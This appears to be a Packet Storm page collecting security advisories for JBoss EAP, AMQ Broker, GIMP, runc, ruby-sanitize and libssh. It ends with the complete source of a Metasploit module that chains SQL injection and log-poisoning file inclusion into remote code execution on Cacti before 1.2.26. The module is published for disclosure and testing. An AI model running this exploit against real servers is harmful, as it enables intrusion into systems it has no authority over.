Red Hat Security Advisory 2024-0711-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8. Issues addressed include a file overwrite vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0711.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 Security update  
Advisory ID:        RHSA-2024:0711-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0711  
Issue date:         2024-02-07  
Revision:           03  
CVE Names:          CVE-2023-4759  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. 

This release of Red Hat JBoss Enterprise Application Platform 7.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.14, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.15 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* jgit: arbitrary file overwrite (CVE-2023-4759)

* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-4759

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/  
https://bugzilla.redhat.com/show_bug.cgi?id=2238614  
https://bugzilla.redhat.com/show_bug.cgi?id=2246070  
https://issues.redhat.com/browse/JBEAP-25375  
https://issues.redhat.com/browse/JBEAP-25616  
https://issues.redhat.com/browse/JBEAP-25785  
https://issues.redhat.com/browse/JBEAP-25944  
https://issues.redhat.com/browse/JBEAP-26013  
https://issues.redhat.com/browse/JBEAP-26021  
https://issues.redhat.com/browse/JBEAP-26025  
https://issues.redhat.com/browse/JBEAP-26049  
https://issues.redhat.com/browse/JBEAP-26051  
https://issues.redhat.com/browse/JBEAP-26101  
https://issues.redhat.com/browse/JBEAP-26115  
https://issues.redhat.com/browse/JBEAP-26159  
https://issues.redhat.com/browse/JBEAP-26164  
https://issues.redhat.com/browse/JBEAP-26169  
https://issues.redhat.com/browse/JBEAP-26266

Red Hat Security Advisory 2024-0711-03

Red Hat Security Advisory 2024-0710-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7. Issues addressed include a file overwrite vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0710.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 Security updateAdvisory ID:        RHSA-2024:0710-03Product:            Red Hat JBoss Enterprise Application PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0710Issue date:         2024-02-07Revision:           03CVE Names:          CVE-2023-4759====================================================================Summary: An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.14, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.15 Release Notes for information about the most significant bug fixes and enhancements included in this release.Security Fix(es):* santuario: Private Key disclosure in debug-log output [eap-7.4.z] (CVE-2023-44483)* jgit: arbitrary file overwrite [eap-7.4.z] (CVE-2023-4759)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4759References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/https://bugzilla.redhat.com/show_bug.cgi?id=2238614https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://issues.redhat.com/browse/JBEAP-25375https://issues.redhat.com/browse/JBEAP-25616https://issues.redhat.com/browse/JBEAP-25785https://issues.redhat.com/browse/JBEAP-25944https://issues.redhat.com/browse/JBEAP-26013https://issues.redhat.com/browse/JBEAP-26021https://issues.redhat.com/browse/JBEAP-26025https://issues.redhat.com/browse/JBEAP-26049https://issues.redhat.com/browse/JBEAP-26051https://issues.redhat.com/browse/JBEAP-26101https://issues.redhat.com/browse/JBEAP-26115https://issues.redhat.com/browse/JBEAP-26159https://issues.redhat.com/browse/JBEAP-26164https://issues.redhat.com/browse/JBEAP-26169https://issues.redhat.com/browse/JBEAP-26266

Red Hat Security Advisory 2024-0710-03

Red Hat Security Advisory 2024-0705-03 - Red Hat AMQ Broker 7.11.6 is now available from the Red Hat Customer Portal. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0705.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat AMQ Broker 7.11.6 release and security updateAdvisory ID:        RHSA-2024:0705-03Product:            Red Hat JBoss AMQAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0705Issue date:         2024-02-06Revision:           03CVE Names:          CVE-2023-44981====================================================================Summary: Red Hat AMQ Broker 7.11.6 is now available from the Red Hat Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.This release of Red Hat AMQ Broker 7.11.6 includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.Security Fix(es):* (CVE-2023-44981) zookeeper: Authorization Bypass in Apache ZooKeeperFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-44981References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.11.6https://access.redhat.com/documentation/en-us/red_hat_amq_broker/7.11https://bugzilla.redhat.com/show_bug.cgi?id=2243436

Red Hat Security Advisory 2024-0705-03

Red Hat Security Advisory 2024-0702-03 - An update for gimp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include buffer overflow and integer overflow vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0702.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: gimp security updateAdvisory ID:        RHSA-2024:0702-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0702Issue date:         2024-02-06Revision:           03CVE Names:          CVE-2023-44441====================================================================Summary: An update for gimp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The GIMP (GNU Image Manipulation Program) is an image composition and editing program. GIMP provides a large image manipulation toolbox, including channel operations and layers, effects, sub-pixel imaging and anti-aliasing, and conversions, all with multi-level undo.Security Fix(es):* gimp: dds buffer overflow RCE (CVE-2023-44441)* gimp: PSD buffer overflow RCE (CVE-2023-44442)* gimp: psp integer overflow RCE (CVE-2023-44443)* gimp: psp off-by-one RCE (CVE-2023-44444)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44441References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2249938https://bugzilla.redhat.com/show_bug.cgi?id=2249942https://bugzilla.redhat.com/show_bug.cgi?id=2249944https://bugzilla.redhat.com/show_bug.cgi?id=2249946

Red Hat Security Advisory 2024-0702-03

Debian Linux Security Advisory 5616-1 - It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer, insufficiently sanitized style elements, which may result in cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5616-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 05, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-sanitizeCVE ID         : CVE-2023-36823It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer,insufficiently sanitised <style> elements, which may result incross-site scripting.For the oldstable distribution (bullseye), this problem has been fixedin version 5.2.1-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 6.0.0-1.1+deb12u1.We recommend that you upgrade your ruby-sanitize packages.For the detailed security status of ruby-sanitize please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ruby-sanitizeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXBWGUACgkQEMKTtsN8TjZKxRAAmKe0iFtImy6hV4qVVAAWxtWArqFhQlMS6SDiBdkkN+0Ep3QMnBX1DKdqHYjtaKSaSr6ho6oWtmQQc4YQfVze+EwQfCQKERYenoJtYS1ljsfrmMpnF6dmonOJzG5W9nf/8JVqmUwwmVCEGtATPBWu7SqLb5zkKqh6zPyf853bNBAqjE6z+CbWaYEkCkIsfe7euOOW3zIIF2GiYCZBEkM9HieehyZdDVOlwTsIlMiELU5BX1eAFAdyBZhoky88c2N4a0uSE8WWXoaNJN5T55sAv1DdqQF0sqfWxOXmmhcu6xbpif4Qh82CO58awW+m/DUHwqSr5pSey2AlThamV0H9CvKOkhZZWQ67ew9HpDEd2AW9aOv0TKuCMGBXqovvSHjvmAI6Jg4VlFe1rD9yFXEhvB5A34/9mh3IRKSk01jrGXIkDqYGPYGEbAle/qGwrTQvUou/js5flST87i3YYh0J8+WzldtVt42jr4RbjcvVefe+sQA8G0ILEgM/+CYjMjSjefnJkTEjGOix522D/qukpBimLjPL+/28Vk41PzF8+q4t665oqpNFHaaGTlrjnoo0HXAxKDpSoK6LbclQGmPjRDe/CFBEUj7tAY5IUXt4yiNLlil3bCCAM5czlnVx3V1Cs236JTwVjR1YFtPUf5/tL7cLyPeelQWenHQ/YJDf4dk==5owE-----END PGP SIGNATURE-----

Debian Security Advisory 5616-1

Red Hat Security Advisory 2024-0670-03 - An update for runc is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0670.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: runc security updateAdvisory ID:        RHSA-2024:0670-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0670Issue date:         2024-02-05Revision:           03CVE Names:          CVE-2024-21626====================================================================Summary: An update for runc is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.Security Fix(es):* runc: file descriptor leak (CVE-2024-21626)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21626References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2024-001https://bugzilla.redhat.com/show_bug.cgi?id=2258725

Red Hat Security Advisory 2024-0670-03

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

American Fuzzy Lop plus plus 4.10c

Debian Linux Security Advisory 5615-1 - It was discovered that runc, a command line client for running applications packaged according to the Open Container Format (OCF), was susceptible to multiple container break-outs due to an internal file descriptor leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5615-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 04, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : runcCVE ID         : CVE-2024-21626It was discovered that runc, a command line client for runningapplications packaged according to the Open Container Format (OCF), wassuspectible to multiple container breakouts due to an internal filedescriptor leak.For the oldstable distribution (bullseye), this problem has been fixedin version 1.0.0~rc93+ds1-5+deb11u3.For the stable distribution (bookworm), this problem has been fixed inversion 1.1.5+ds1-1+deb12u1.We recommend that you upgrade your runc packages.For the detailed security status of runc please refer toits security tracker page at:https://security-tracker.debian.org/tracker/runcFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW/2/oACgkQEMKTtsN8TjbbzxAAh2354+lngRRQ7hLtEYgFa8SrkJmgIAMPvR5S1fNWh60wOdUG1690QuzxQm19ZpcF/QJFw6yefECYHWMzmqBJiv2WNadGOT7S9YqZ+ILz/ohwA+1HjH92F/Xl5BTA+Rg9O2hTSqGdDUB8qPpz0/mBin89m1B0y6xpLgF2C/3NiNkOeiuSmVcMsAc/h64VovNPuRGz3/VcPPyO85avjL6ZXEA9L48dPoliTzonNOk+DRgYb4YsFTP1T0RcyrchTLljMkCx2l8gVWKD0BLtH8wDO12kOAlAtnPN9ufB9FXfe9axobvOYalYzOca5/kvRVZ246GwyUG+OM9y01AJsZzKMHnqcT8T3q27FRGu9OFYMN0gONnTLiwEYrjxonzBApm0OPg5XqflRTxVL154tIQi9jmyxGDsHdRmtBCeQw2B7bvoX/bpFijcjvP3FLSWkKmduGocrYm4FgnwiYgh4714fo56HZG4x9u+Y4iplPQWlnv9dEVAzw/oUGr+z0s1TJLfZYEZSpmju2e7afiZbRHdB7YBx8wj02R7yIJJF2sF3tk5eo2UpRJzBSwaolek8b4PcQBsT5h8UAmT0z6WhSFOXwjhmkMD61OFUoPEmWlXJz9VbbWuqmd4R23iYq3r9nkaieQutrbc+i7EXMUT42ogZgOFBG1mQPXeL8PECXfnazs==H2CG-----END PGP SIGNATURE-----

Debian Security Advisory 5615-1

Ubuntu Security Notice 6592-2 - USN-6592-1 fixed vulnerabilities in libssh. This update provides the corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that libssh incorrectly handled the ProxyCommand and the ProxyJump features. A remote attacker could possibly use this issue to inject malicious code into the command of the features mentioned through the hostname parameter.

==========================================================================  
Ubuntu Security Notice USN-6592-2  
February 05, 2024

libssh vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in libssh.

Software Description:  
- libssh: A tiny C SSH library

Details:

USN-6592-1 fixed vulnerabilities in libssh. This update provides the  
corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

It was discovered that libssh incorrectly handled the ProxyCommand and the  
ProxyJump features. A remote attacker could possibly use this issue to  
inject malicious code into the command of the features mentioned through  
the hostname parameter. (CVE-2023-6004)

It was discovered that libssh incorrectly handled return codes when  
performing message digest operations. A remote attacker could possibly use  
this issue to cause libssh to crash, obtain sensitive information, or  
execute arbitrary code. (CVE-2023-6918)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
libssh-4 0.8.0~20170825.94fa1e38-1ubuntu0.7+esm3  
libssh-gcrypt-4 0.8.0~20170825.94fa1e38-1ubuntu0.7+esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
libssh-4 0.6.3-4.3ubuntu0.6+esm1  
libssh-gcrypt-4 0.6.3-4.3ubuntu0.6+esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6592-2  
https://ubuntu.com/security/notices/USN-6592-1  
CVE-2023-6004, CVE-2023-6918

Ubuntu Security Notice USN-6592-2

This Metasploit exploit module leverages sql injection and local file inclusion vulnerabilities in Cacti versions prior to 1.2.26 to achieve remote code execution. Authentication is needed and the account must have access to the vulnerable PHP script (pollers.php). This is granted by setting the Sites/Devices/Data permission in the General Administration section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::SQLi  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class CactiError < StandardError; end  class CactiNotFoundError < CactiError; end  class CactiVersionNotFoundError < CactiError; end  class CactiNoAccessError < CactiError; end  class CactiCsrfNotFoundError < CactiError; end  class CactiLoginError < CactiError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti RCE via SQLi in pollers.php',        'Description' => %q{          This exploit module leverages a SQLi (CVE-2023-49085) and a LFI          (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to          achieve RCE. Authentication is needed and the account must have access          to the vulnerable PHP script (`pollers.php`). This is granted by          setting the `Sites/Devices/Data` permission in the `General          Administration` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Aleksey Solovev', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)          [ 'CVE', '2023-49085'], # SQLi          [ 'CVE', '2023-49084'] # LFI (RCE)        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ]            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ]        ],        'DefaultOptions' => {          'SqliDelay' => 3        },        'DisclosureDate' => '2023-12-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def sqli    @sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|      sqli_final_payload = '"'      sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')      sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\""      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'pollers.php'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          '__csrf_magic' => @csrf_token,          'name' => 'Main Poller',          'hostname' => 'localhost',          'timezone' => '',          'notes' => '',          'processes' => '1',          'threads' => '1',          'id' => '2',          'save_component_poller' => '1',          'action' => 'save',          'dbhost' => sqli_final_payload        },        'vars_get' => {          'header' => 'false'        }      )    end  end  def get_version(html)    # This will return an empty string if there is no match    version_str = html.xpath('//div[@class="versionInfo"]').text    unless version_str.include?('The Cacti Group')      raise CactiNotFoundError, 'The web server is not running Cacti'    end    unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/)      raise CactiVersionNotFoundError, 'Could not detect the version'    end    Regexp.last_match[:version]  end  def get_csrf_token(html)    html.xpath('//form/input[@name="__csrf_magic"]/@value').text  end  def do_login    if @csrf_token.blank? || @cacti_version.blank?      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'GET',        'keep_cookies' => true      )      if res.nil?        raise CactiNoAccessError, 'Could not access `index.php` - no response'      end      html = res.get_html_document      if @csrf_token.blank?        print_status('Getting the CSRF token to login')        @csrf_token = get_csrf_token(html)        if @csrf_token.empty?          # raise an error since without the CSRF token, we cannot login          raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'        else          vprint_good("CSRF token: #{@csrf_token}")        end      end      if @cacti_version.blank?        print_status('Getting the version')        begin          @cacti_version = get_version(html)          vprint_good("Version: #{@cacti_version}")        rescue CactiError => e          # We can still log in without the version          print_bad("Could not get the version, the exploit might fail: #{e}")        end      end    end    print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        '__csrf_magic' => @csrf_token,        'action' => 'login',        'login_username' => datastore['USERNAME'],        'login_password' => datastore['PASSWORD']      }    )    raise CactiNoAccessError, 'Could not login - no response' if res.nil?    raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302    print_good('Logged in')  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      @cacti_version = get_version(html)      version_msg = "The web server is running Cacti version #{@cacti_version}"    rescue CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = get_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login    rescue CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `pollers.php`    print_status('Checking permissions to access `pollers.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'pollers.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    )    return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?    return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401    return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # Step 4 - Check if it is vulnerable to SQLi    print_status('Attempting SQLi to check if the target is vulnerable')    return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable    CheckCode::Vulnerable  end  def get_ext_link_id    # Get an unused External Link ID with a time-based SQLi    @ext_link_id = rand(1000..9999)    loop do      _res, elapsed_time = Rex::Stopwatch.elapsed_time do        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")      end      break if elapsed_time < datastore['SqliDelay']      @ext_link_id = rand(1000..9999)    end    vprint_good("Got external link ID #{@ext_link_id}")  end  def exploit    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`    unless @logged_in      begin        do_login      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e}")      end    end    @log_file_path = "log/cacti#{rand(1..999)}.log"    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")    @log_setting_name_bak = '_path_cactilog'    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")    @do_settings_cleanup = true    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")    register_file_for_cleanup(@log_file_path)    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")    log_file_path_lfi = "../../#{@log_file_path}"    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')    get_ext_link_id    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")    @do_ext_link_cleanup = true    print_status('Getting the user ID and setting permissions (it might take a few minutes)')    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")    @do_perms_cleanup = true    print_status('Logging in again to apply new settings and permissions')    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.    cookie_jar_bak = cookie_jar.clone    cookie_jar.clear    csrf_token_bak = @csrf_token    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token    @csrf_token = nil    begin      do_login    rescue CactiError => e      fail_with(Failure::NoAccess, "Login failure: #{e}")    end    print_status('Poisoning the log')    header_name = rand_text_alpha(1).upcase    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")    print_status('Triggering the payload')    # Expecting no response    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'link.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        header_name => payload.encoded      },      'vars_get' => {        'id' => @ext_link_id,        'headercontent' => 'true'      }    }, 0)    # Restore the cookie_jar and the CSRF token to run cleanup without being blocked    cookie_jar.clear    self.cookie_jar = cookie_jar_bak    @csrf_token = csrf_token_bak  end  def cleanup    super    if @do_ext_link_cleanup      print_status('Cleaning up external link using SQLi')      sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")    end    if @do_perms_cleanup      print_status('Cleaning up permissions using SQLi')      sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")    end    if @do_settings_cleanup      print_status('Cleaning up the log path in `settings` table using SQLi')      sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")      sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")    end  endend

Source

Packet Storm